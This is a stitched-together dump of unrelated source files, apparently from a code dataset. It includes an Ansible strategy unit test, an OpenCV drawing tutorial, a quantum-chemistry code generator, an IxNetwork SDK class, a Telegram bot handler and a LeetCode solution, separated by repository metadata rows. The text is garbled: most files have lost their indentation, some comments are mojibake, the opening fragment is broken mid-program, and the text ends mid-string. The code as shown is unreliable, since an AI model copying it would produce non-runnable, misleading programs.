bits[int(line[1])] = 0
elif line[0] == 'AND':
i, j = int(line[1]), int(line[2])
if bits[i] == 0 or bits[j] == 0:
bits[i] = 0
elif bits[i] == 1 and bits[j] == 1:
bits[i] = 1
else:
bits[i] = -1
elif line[0] == 'OR':
i, j = int(line[1]), int(line[2])
if bits[i] == 1 or bits[j] == 1:
bits[i] = 1
elif bits[i] == -1 or bits[j] == -1:
bits[i] = -1
n = int(input())
for i in range(32):
if bits[i] == -1:
bits[i] = "?"
else:
bits[i] = str(bits[i])
print("".join(bits[::-1]))
if __name__ == '__main__':
main()
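# Example session (editor's hand-checked illustration, not an official sample):
#   input:  2
#           SET 0
#           OR 1 0
#           0
#   output: ??????????????????????????????11   (30 unknown bits, then bits 1 and 0 set)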
# ---- coll-test/notstdlib.moveitallout -- tests/unit/plugins/strategy/test_strategy_linear.py (no license) ----
# Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.notstdlib.moveitallout.tests.unit.compat import unittest
from ansible_collections.notstdlib.moveitallout.tests.unit.compat.mock import patch, MagicMock
from ansible.executor.play_iterator import PlayIterator
from ansible.playbook import Playbook
from ansible.playbook.play_context import PlayContext
from ansible_collections.notstdlib.moveitallout.plugins.strategy.linear import StrategyModule
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.loader import DictDataLoader
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.path import mock_unfrackpath_noop
class TestStrategyLinear(unittest.TestCase):
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_noop(self):
fake_loader = DictDataLoader({
"test_play.yml": """
- hosts: all
gather_facts: no
tasks:
- block:
- block:
- name: task1
debug: msg='task1'
failed_when: inventory_hostname == 'host01'
- name: task2
debug: msg='task2'
rescue:
- name: rescue1
debug: msg='rescue1'
- name: rescue2
debug: msg='rescue2'
""",
})
mock_var_manager = MagicMock()
mock_var_manager._fact_cache = dict()
mock_var_manager.get_vars.return_value = dict()
p = Playbook.load('test_play.yml', loader=fake_loader, variable_manager=mock_var_manager)
inventory = MagicMock()
inventory.hosts = {}
hosts = []
for i in range(0, 2):
host = MagicMock()
host.name = host.get_name.return_value = 'host%02d' % i
hosts.append(host)
inventory.hosts[host.name] = host
inventory.get_hosts.return_value = hosts
inventory.filter_hosts.return_value = hosts
mock_var_manager._fact_cache['host00'] = dict()
play_context = PlayContext(play=p._entries[0])
itr = PlayIterator(
inventory=inventory,
play=p._entries[0],
play_context=play_context,
variable_manager=mock_var_manager,
all_vars=dict(),
)
tqm = TaskQueueManager(
inventory=inventory,
variable_manager=mock_var_manager,
loader=fake_loader,
passwords=None,
forks=5,
)
tqm._initialize_processes(3)
strategy = StrategyModule(tqm)
strategy._hosts_cache = [h.name for h in hosts]
strategy._hosts_cache_all = [h.name for h in hosts]
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# debug: task1, debug: task1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, 'task1')
self.assertEqual(host2_task.name, 'task1')
# mark the second host failed
itr.mark_host_failed(hosts[1])
# debug: task2, meta: noop
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'meta')
self.assertEqual(host1_task.name, 'task2')
self.assertEqual(host2_task.name, '')
# meta: noop, debug: rescue1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue1')
# meta: noop, debug: rescue2
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue2')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# end of iteration
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNone(host1_task)
self.assertIsNone(host2_task)
# ---- miao88318/day03_apiTestIHRM -- script/test_inrm_login_params.py (no license) ----
# Imports
import unittest
import logging
import requests
from parameterized import parameterized
import app
from api.login_api import TestLoginApi
from utils import assert_common, read_login_data
# Create the test class, inheriting from unittest.TestCase
class TestIHRMLogin(unittest.TestCase):
def setUp(self):
self.login_api = TestLoginApi()
def tearDown(self):
...
filename = app.BASE_DIR + "/data/login_data.json"
@parameterized.expand(read_login_data(filename))
    def test01_login_success(self, case_name, jsonData, http_code, success, code, message):
        # Send the login request
        headers = {"Content-Type": "application/json"}
response = self.login_api.login(jsonData, headers)
result = response.json()
# print("็ปๆ:", result)
logging.info("็ปๆ: {}".format(result))
# ไฝฟ็จๅฐ่ฃ
็้็จๆญ่จๅฝๆฐ
assert_common(http_code, success, code, message, response, self)
# ---- msrLi/portingSources -- opencv/opencv-3.4.2/samples/python/tutorial_code/core/BasicGeometricDrawing/basic_geometric_drawing.py (BSD-3-Clause, Apache-2.0) ----
import cv2 as cv
import numpy as np
W = 400
## [my_ellipse]
def my_ellipse(img, angle):
thickness = 2
line_type = 8
cv.ellipse(img,
               (W // 2, W // 2),
               (W // 4, W // 16),
angle,
0,
360,
(255, 0, 0),
thickness,
line_type)
## [my_ellipse]
## [my_filled_circle]
def my_filled_circle(img, center):
thickness = -1
line_type = 8
cv.circle(img,
center,
              W // 32,
(0, 0, 255),
thickness,
line_type)
## [my_filled_circle]
## [my_polygon]
def my_polygon(img):
line_type = 8
# Create some points
    ppt = np.array([[W // 4, 7 * W // 8], [3 * W // 4, 7 * W // 8],
                    [3 * W // 4, 13 * W // 16], [11 * W // 16, 13 * W // 16],
                    [19 * W // 32, 3 * W // 8], [3 * W // 4, 3 * W // 8],
                    [3 * W // 4, W // 8], [26 * W // 40, W // 8],
                    [26 * W // 40, W // 4], [22 * W // 40, W // 4],
                    [22 * W // 40, W // 8], [18 * W // 40, W // 8],
                    [18 * W // 40, W // 4], [14 * W // 40, W // 4],
                    [14 * W // 40, W // 8], [W // 4, W // 8],
                    [W // 4, 3 * W // 8], [13 * W // 32, 3 * W // 8],
                    [5 * W // 16, 13 * W // 16], [W // 4, 13 * W // 16]], np.int32)
ppt = ppt.reshape((-1, 1, 2))
cv.fillPoly(img, [ppt], (255, 255, 255), line_type)
    # Only drawing the lines would be:
# cv.polylines(img, [ppt], True, (255, 0, 255), line_type)
## [my_polygon]
## [my_line]
def my_line(img, start, end):
thickness = 2
line_type = 8
cv.line(img,
start,
end,
(0, 0, 0),
thickness,
line_type)
## [my_line]
## [create_images]
# Windows names
atom_window = "Drawing 1: Atom"
rook_window = "Drawing 2: Rook"
# Create black empty images
size = W, W, 3
atom_image = np.zeros(size, dtype=np.uint8)
rook_image = np.zeros(size, dtype=np.uint8)
## [create_images]
## [draw_atom]
# 1. Draw a simple atom:
# -----------------------
# 1.a. Creating ellipses
my_ellipse(atom_image, 90)
my_ellipse(atom_image, 0)
my_ellipse(atom_image, 45)
my_ellipse(atom_image, -45)
# 1.b. Creating circles
my_filled_circle(atom_image, (W // 2, W // 2))
## [draw_atom]
## [draw_rook]
# 2. Draw a rook
# ------------------
# 2.a. Create a convex polygon
my_polygon(rook_image)
## [rectangle]
# 2.b. Creating rectangles
cv.rectangle(rook_image,
             (0, 7 * W // 8),
             (W, W),
(0, 255, 255),
-1,
8)
## [rectangle]
# 2.c. Create a few lines
my_line(rook_image, (0, 15 * W // 16), (W, 15 * W // 16))
my_line(rook_image, (W // 4, 7 * W // 8), (W // 4, W))
my_line(rook_image, (W // 2, 7 * W // 8), (W // 2, W))
my_line(rook_image, (3 * W // 4, 7 * W // 8), (3 * W // 4, W))
## [draw_rook]
cv.imshow(atom_window, atom_image)
cv.moveWindow(atom_window, 0, 200)
cv.imshow(rook_window, rook_image)
cv.moveWindow(rook_window, W, 200)
cv.waitKey(0)
cv.destroyAllWindows()
# ---- mussard/SecondQuantizationAlgebra -- legacy/lcc_codes/lcc_ccvv.py (LicenseRef-scancode-philippe-de-muyter) ----
import secondQuantizationAlgebra as sqa
import writeCode
import geraldCode
sqa.options.verbose = False
# definitions
tag_core = sqa.options.core_type
tag_active = sqa.options.active_type
tag_virtual = sqa.options.virtual_type
a = sqa.index('Va', [tag_virtual], True)
b = sqa.index('Vb', [tag_virtual], True)
c = sqa.index('Vc', [tag_virtual], True)
d = sqa.index('Vd', [tag_virtual], True)
i = sqa.index('Ci', [tag_core], True)
j = sqa.index('Cj', [tag_core], True)
k = sqa.index('Ck', [tag_core], True)
l = sqa.index('Cl', [tag_core], True)
p = sqa.index('Ap', [tag_active], True)
q = sqa.index('Aq', [tag_active], True)
r = sqa.index('Ar', [tag_active], True)
s = sqa.index('As', [tag_active], True)
x1 = sqa.index('Au', [tag_active], True)
x2 = sqa.index('Av', [tag_active], True)
x3 = sqa.index('Aw', [tag_active], True)
x4 = sqa.index('Ax', [tag_active], True)
i1 = sqa.index('Cm', [tag_core], True)
i2 = sqa.index('Cn', [tag_core], True)
i3 = sqa.index('Co', [tag_core], True)
i4 = sqa.index('Co1', [tag_core], True)
a1 = sqa.index('Vg', [tag_virtual], True)
a2 = sqa.index('Vh', [tag_virtual], True)
a3 = sqa.index('Ve', [tag_virtual], True)
a4 = sqa.index('Vf', [tag_virtual], True)
# Index-permutation symmetries: sqa.symmetry(perm, factor) declares that
# reordering a tensor's indices by `perm` multiplies it by `factor`.
hsym = sqa.symmetry((1,0), 1)         # one-body integrals are symmetric: h_pq = h_qp
Dsym_a = sqa.symmetry((2,1, 0,3), 1)  # swap bra/ket of electron 1 (real integrals)
Dsym_b = sqa.symmetry((0,3, 2,1), 1)  # swap bra/ket of electron 2
Dsym_c = sqa.symmetry((1,0, 3,2), 1)  # interchange electrons 1 and 2
K_C = sqa.tensor('int1c', [i1,i2], [hsym])
K_A = sqa.tensor('int1a', [x1,x2], [hsym])
K_V = sqa.tensor('int1v', [a1,a2], [hsym])
V_CA1 = sqa.tensor('int2ca1', [i1,x1, i2,x2], [Dsym_a, Dsym_b])
V_CA2 = sqa.tensor('int2ca2', [i1,x1, x2,i2], [])
V_CV1 = sqa.tensor('int2cv1', [i1,a1, i2,a2], [Dsym_a, Dsym_b])
V_CV2 = sqa.tensor('int2cv2', [i1,a1, a2,i2], [])
V_AV1 = sqa.tensor('int2av1', [x1,a1, x2,a2], [Dsym_a, Dsym_b])
V_AV2 = sqa.tensor('int2av2', [x1,a1, a2,x2], [])
V_C = sqa.tensor('int2c', [i1,i2, i3,i4], [Dsym_a, Dsym_b, Dsym_c])
V_A = sqa.tensor('int2a', [x1,x2, x3,x4], [Dsym_a, Dsym_b, Dsym_c])
V_V = sqa.tensor('int2v', [a1,a2, a3,a4], [Dsym_a, Dsym_b, Dsym_c])
deltaC = sqa.tensor('deltac', [i1,i2], [hsym])
deltaA = sqa.tensor('deltaa', [x1,x2], [hsym])
deltaV = sqa.tensor('deltav', [a1,a2], [hsym])
ampstring = "eecc" #amplitude string
AllTensors = ["t", "R", "int1c", "int1a", "int1v", "int2ca1", "int2ca2",\
"int2cv1", "int2cv2", "int2av1", "int2av2", "int2c", "int2a", "int2v",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "V", "deltac", "deltaa", "deltav", "t1"]
CommentTensors = ["t", "R", "k", "k", "k", "W", "W",\
"W", "W", "W", "W", "W", "W", "W",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "W", "delta", "delta", "delta", "t1"]
Domains = [ampstring, ampstring, "cc", "aa", "ee", "caca", "caac",\
"cece", "ceec", "aeae", "aeea", "cccc", "aaaa", "eeee",\
"aa", "aaaa", "aaaaaa", "aa", "aa", ampstring, ampstring, ampstring, ampstring,\
ampstring, ampstring, ampstring, ampstring, "cc", "aa", "ee", ampstring]
Usage = ["A", "R", "H", "H", "H", "H", "H",\
"H", "H", "H", "H", "H", "H", "H",\
"D", "D", "D", "D", "D", "A", "A", "A", "A",\
"A", "A", "A", "H", "D", "D", "D", "A"]
pDomains = "\tint f(int i) {\n"
pDomains += "\t\treturn 2*i;\n"
pDomains += "\t}\n"
pDomains += "\tFDomainDecl DomainDecls[1] = {\n"
pDomains += "\t\t{\"A\", \"a\", f}\n"
pDomains += "\t};"
CommentKey = {}
print "namespace MRLCC_CCVV {\n"
for tc in list(zip(AllTensors, CommentTensors)):
CommentKey[tc[0]] = tc[1]
geraldCode.writeTensors(AllTensors, CommentKey, Domains, Usage)
HD_C = sqa.term( 0.5, [""], [V_C, sqa.sfExOp([i1,i2,i3,i4])] )
HD_A = sqa.term( 0.5, [""], [V_A, sqa.sfExOp([x1,x2,x3,x4])] )
HD_V = sqa.term( 0.5, [""], [V_V, sqa.sfExOp([a1,a2,a3,a4])] )
HD_CA1 = sqa.term( 1.0, [""], [V_CA1, sqa.sfExOp([i1,x1,i2,x2])] )
HD_CA2 = sqa.term( 1.0, [""], [V_CA2, sqa.sfExOp([i1,x1,x2,i2])] )
HD_CV1 = sqa.term( 1.0, [""], [V_CV1, sqa.sfExOp([i1,a1,i2,a2])] )
HD_CV2 = sqa.term( 1.0, [""], [V_CV2, sqa.sfExOp([i1,a1,a2,i2])] )
HD_AV1 = sqa.term( 1.0, [""], [V_AV1, sqa.sfExOp([x1,a1,x2,a2])] )
HD_AV2 = sqa.term( 1.0, [""], [V_AV2, sqa.sfExOp([x1,a1,a2,x2])] )
T_C = sqa.term( 1.0, [""], [K_C, sqa.sfExOp([i1,i2])] )
T_A = sqa.term( 1.0, [""], [K_A, sqa.sfExOp([x1,x2])] )
T_V = sqa.term( 1.0, [""], [K_V, sqa.sfExOp([a1,a2])] )
Cin = sqa.tensor("p", [a,b,i,j], [Dsym_c])
Cout = sqa.tensor("Ap", [c,d,k,l], [Dsym_c])
#first excitation
E_aiEbj = sqa.term( 1.0, [""], [Cin, sqa.sfExOp([a, i]) , sqa.sfExOp([b,j])])
E_aiEbj2 = sqa.term( 1.0, [""], [Cout, sqa.sfExOp([l, d]) , sqa.sfExOp([k,c])])
commutator = []
commutator += sqa.commutator(HD_C, E_aiEbj)
commutator += sqa.commutator(HD_A, E_aiEbj)
commutator += sqa.commutator(HD_V, E_aiEbj)
commutator += sqa.commutator(HD_CA1, E_aiEbj)
commutator += sqa.commutator(HD_CA2, E_aiEbj)
commutator += sqa.commutator(HD_CV1, E_aiEbj)
commutator += sqa.commutator(HD_CV2, E_aiEbj)
commutator += sqa.commutator(HD_AV1, E_aiEbj)
commutator += sqa.commutator(HD_AV2, E_aiEbj)
commutator += sqa.commutator(T_C, E_aiEbj)
commutator += sqa.commutator(T_A, E_aiEbj)
commutator += sqa.commutator(T_V, E_aiEbj)
result = []
for t in commutator:
result += sqa.normalOrder(sqa.multiplyTerms(E_aiEbj2, t))
for t in result:
t.contractDeltaFuncs_new()
sqa.removeVirtOps_sf(result)
sqa.termChop(result)
sqa.combineTerms(result)
extendedR=[]
for t in result:
extendedR += sqa.contractCoreOps_sf(t)
for t in extendedR:
t.contractDeltaFuncs_new()
sqa.termChop(extendedR)
sqa.combineTerms(extendedR)
#for t in extendedR:
# print t
#print
result = []
rdmDelta = [deltaC, deltaA, deltaV]
#******** this adds delta functions when we have repeated indices ****************#
for r in extendedR:
result.append(geraldCode.replaceRepeatIndicesWithDeltas(r, rdmDelta))
print "//Number of terms : ", len(result)
print "\tFEqInfo EqsRes[%i] = {\n"%(len(result))
geraldCode.WriteCode_lccSimple(result, AllTensors, CommentKey)
print "\n\t};"
bindex = AllTensors.index("b")
Vindex = AllTensors.index("V")
E1index = AllTensors.index("deltac")
print pDomains
print "\tFEqInfo Overlap[4] = {"
print "\t\t{\"CDKL,LM,CDKM\", 2.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,DCKM\",-1.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,CDMK\",-1.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,DCMK\", 2.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t};"
print "\tstatic void GetMethodInfo(FMethodInfo &Out) {"
print "\t\tOut = FMethodInfo();"
print "\t\tOut.pName = \"MRLCC_CCVV\";"
print "\t\tOut.perturberClass = \"CCVV\";"
print "\t\tOut.pSpinClass = \"restricted\";"
print "\t\tOut.pTensorDecls = &TensorDecls[0];"
print "\t\tOut.nTensorDecls = %i;"%(len(Usage))
print "\t\tOut.pDomainDecls = &DomainDecls[0];"
print "\t\tOut.nDomainDecls = 0;"
print "\t\tOut.EqsRes = FEqSet(&EqsRes[0], %i, \"MRLCC_CCVV/Res\");"%(len(result))
print "\t\tOut.Overlap = FEqSet(&Overlap[0], 4, \"MRLCC_CCVV/Overlap\");"
print "\t};"
print "};"
'''
intmapkey = {"Va" : "nc:", "Vb" : "nc:", "Vc" : "nc:", "Vd" : "nc:", "a" : ":ncore", "b" : ":ncore", "c" : ":ncore", "d" : ":ncore"}
RDMmapkey = {"a" : ":", "b" : ":", "c" : ":", "d" : ":"}
writeCode.WriteCode(extendedR, True, intmapkey, RDMmapkey)
exit(0)
'''
| [
"[email protected]"
] | |
27e81b006347dc87e451cca4626b5d9a652d671e | 1eab574606dffb14a63195de994ee7c2355989b1 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/labelspace_buum91dgvsyw5nzs9sywjlbfnwywnl.py | 07c893743c85322fac1af7af913f0cc8e9d27226 | [
"MIT"
] | permissive | steiler/ixnetwork_restpy | 56b3f08726301e9938aaea26f6dcd20ebf53c806 | dd7ec0d311b74cefb1fe310d57b5c8a65d6d4ff9 | refs/heads/master | 2020-09-04T12:10:18.387184 | 2019-11-05T11:29:43 | 2019-11-05T11:29:43 | 219,728,796 | 0 | 0 | null | 2019-11-05T11:28:29 | 2019-11-05T11:28:26 | null | UTF-8 | Python | false | false | 3,341 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LabelSpace(Base):
"""This object configures the labels for the route range.
The LabelSpace class encapsulates a required labelSpace resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'labelSpace'
def __init__(self, parent):
super(LabelSpace, self).__init__(parent)
@property
def End(self):
"""The last label value available in the label space (range).
Returns:
number
"""
return self._get_attribute('end')
@End.setter
def End(self, value):
self._set_attribute('end', value)
@property
def LabelId(self):
"""The identifier for the label space.
Returns:
number
"""
return self._get_attribute('labelId')
@LabelId.setter
def LabelId(self, value):
self._set_attribute('labelId', value)
@property
def Mode(self):
"""Sets the Label mode.
Returns:
str(fixedLabel|incrementLabel)
"""
return self._get_attribute('mode')
@Mode.setter
def Mode(self, value):
self._set_attribute('mode', value)
@property
def Start(self):
"""The first label value available in the label space (range). The default is 16.
Returns:
number
"""
return self._get_attribute('start')
@Start.setter
def Start(self, value):
self._set_attribute('start', value)
@property
def Step(self):
"""The value to add for creating each additional label value.
Returns:
number
"""
return self._get_attribute('step')
@Step.setter
def Step(self, value):
self._set_attribute('step', value)
def update(self, End=None, LabelId=None, Mode=None, Start=None, Step=None):
"""Updates a child instance of labelSpace on the server.
Args:
End (number): The last label value available in the label space (range).
LabelId (number): The identifier for the label space.
Mode (str(fixedLabel|incrementLabel)): Sets the Label mode.
Start (number): The first label value available in the label space (range). The default is 16.
Step (number): The value to add for creating each additional label value.
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
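    # Usage sketch (illustrative, not from the SDK docs): `route_range` stands
    # for any parent resource object that exposes this required LabelSpace
    # child; the keyword names match the properties defined above.
    #
    #     label_space = route_range.LabelSpace
    #     label_space.update(Mode='incrementLabel', Start=16, Step=1, End=1048575)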
| [
"[email protected]"
] | |
0e2bc5af47220d0e776cd4bfd2f23a7afeb398d4 | 789a540bbb79c334cbeaf3687876bfd939e4290b | /app/handlers/private/default/message/menu/sellers/show_category_sellers.py | db4caa4d7348436fd646cd2e4ad4ab67492dde55 | [] | no_license | ExissBrr/TRIGON-GARANT-BOT | 2cc96f5f6f195f4e76c164db4f8acafbfa5b7662 | 812acf060eb92e6fad21568a75e6dba7ce0da4d9 | refs/heads/main | 2023-07-04T18:22:43.507453 | 2021-08-17T14:51:30 | 2021-08-17T14:51:30 | 392,725,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | from aiogram.dispatcher.filters import Command
from aiogram.types import Message
from app import keyboards
from app.data import text
from app.data.types.category_data import ServiceCategoryType
from app.data.types.links import category_link
from app.data.types.seller_data import SellerStatus
from app.loader import dp
from app.utils.db_api.models.sellers import Seller
@dp.message_handler(Command('seller_category'))
async def show_sellers_in_category(message: Message, lang_code):
category_from_args = message.text.split(':')[-1]
await message.delete()
if category_from_args not in ServiceCategoryType.__dict__.values():
await message.answer(
text=text[lang_code].default.message.choose_category_among_list
)
return False
for key, value in ServiceCategoryType.__dict__.items():
if value == category_from_args:
photo_url = category_link[key]
sellers = await Seller.query.where(Seller.status == SellerStatus.ACTIVE).where(
Seller.category == category_from_args).gino.all()
await message.answer_photo(
photo=photo_url,
caption=text[lang_code].default.message.seller_list_in_category.format(category=category_from_args),
reply_markup=await keyboards.default.inline.sellers.show_seller_list_in_category.make_keyboard_sellers_list(
sellers=sellers,
category_name=category_from_args)
)
| [
"[email protected]"
] | |
076e2398568768a8a288eeb4e5dd7d351fd1ea99 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/Ablation4_ch016_ep003/Gather3_W_fix3blk_C_change/train/pyr_0s/L4/step09_0side_L4.py | f05661764ce1d26fa473aac73bbf00769cf8c4ad | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,007 | py | #############################################################################################################################################################################################################
from step08_c_use_G_generate_I_w_M_to_Wx_Wy_Wz_focus_to_Cx_Cy_focus_combine import I_w_M_to_W_to_C
from step08_b_use_G_generate_0_util import Tight_crop, Color_jit
from step09_c_train_step import Train_step_I_w_M_to_W_to_C
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
color_jit = Color_jit(do_ratio=0.6)
use_gen_op_p20     = I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 0) )  ### My current multi_model I_to_Wxyz_to_Cxy_general returns all of Wz_pre_w_M, Wy_pre_w_M, Wx_pre_w_M, Cx_pre_w_M, Cy_pre_w_M, so regardless of wi/woDIV, setting every Separate flag to True is correct
use_train_step_p20 = Train_step_I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 15), color_jit=color_jit )  ### Same reasoning as above: every output is returned, so Separate is set to True everywhere
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.W_w_M_to_C_pyr.pyr_0s.L4.step09_0side_L4 import *
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.I_w_M_to_W_pyr.pyr_3s.L5.step09_3side_L5 import ch032_pyramid_1side_6__2side_6__3side_6 as I_w_M_to_W_Tcrop255_p20_3s_L5_good
import time
start_time = time.time()
###############################################################################################################################################################################################
#########################################################################################
ch032_pyramid_0side_and_1s6_2s6 = KModel_builder().set_model_name(MODEL_NAME.multi_flow_unet).set_multi_model_builders(op_type="I_to_Wxyz_to_Cxy_general", W_to_Cx_Cy=ch032_pyramid_0side, I_to_Wx_Wy_Wz=I_w_M_to_W_Tcrop255_p20_3s_L5_good).set_multi_model_separate_focus(I_to_W_separ=False, I_to_W_focus=True, W_to_C_separ=False, W_to_C_focus=True).set_gen_op( use_gen_op_p20 ).set_train_step( use_train_step_p20 )
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 512, 512, 1))
use_model = ch032_pyramid_0side
use_model = use_model.build()
result = use_model.generator(data, Mask=data)
print(result[0].shape)
from kong_util.tf_model_util import Show_model_weights
Show_model_weights(use_model.generator)
use_model.generator.summary()
| [
"[email protected]"
] | |
cf9a6b4197df455636515613c5824e6d9f7308fb | 58afefdde86346760bea40690b1675c6639c8b84 | /leetcode/next-greater-element-iii/282256643.py | f2f7254ab8ded0ed13d4530720a51054bf710131 | [] | no_license | ausaki/data_structures_and_algorithms | aaa563f713cbab3c34a9465039d52b853f95548e | 4f5f5124534bd4423356a5f5572b8a39b7828d80 | refs/heads/master | 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # title: next-greater-element-iii
# detail: https://leetcode.com/submissions/detail/282256643/
# datetime: Thu Nov 28 18:18:27 2019
# runtime: 28 ms
# memory: 12.7 MB
import bisect
class Solution:
    def nextGreaterElement(self, n: int) -> int:
        if n < 10:
            return -1
        # Peel digits off the right end while they are non-decreasing,
        # i.e. while that suffix of n is already its largest arrangement.
        digits = []
        while n:
            n, d = divmod(n, 10)
            if not digits or d >= digits[-1]:
                digits.append(d)
            else:
                # d is the first digit (from the right) that can grow: swap it
                # with the smallest collected digit larger than d, then append
                # the collected digits in ascending order to rebuild the
                # smallest possible suffix.
                i = bisect.bisect(digits, d)
                digits[i], d = d, digits[i]
                n = n * 10 + d
                for d in digits:
                    n = n * 10 + d
                return n if n <= (2 ** 31 - 1) else -1
        # All digits were non-increasing left to right, so n is already the
        # largest permutation of its digits.
        return -1
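# Quick sanity checks (sample cases from the problem statement):
if __name__ == '__main__':
    assert Solution().nextGreaterElement(12) == 21
    assert Solution().nextGreaterElement(21) == -1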
| [
"[email protected]"
] | |
3a408a86fe1300ed34d82149434b6881b3685bb5 | 80ea03860dedce77e53594472385657bfcd5b6cd | /test/test_cons.py | 963ab07dd3c8c669dd3fa0ffbe02335e985d7c7f | [] | no_license | RelationalAI-oss/relationalai-sdk-python | 434f0531226367d7eccc66ab6c77caafafaa3ce5 | fdea5fdec84231ae0bb3f2bfd32ed84e962052ae | refs/heads/master | 2023-06-10T01:48:05.624101 | 2021-06-29T15:07:44 | 2021-06-29T15:07:44 | 379,428,666 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 922 | py | """
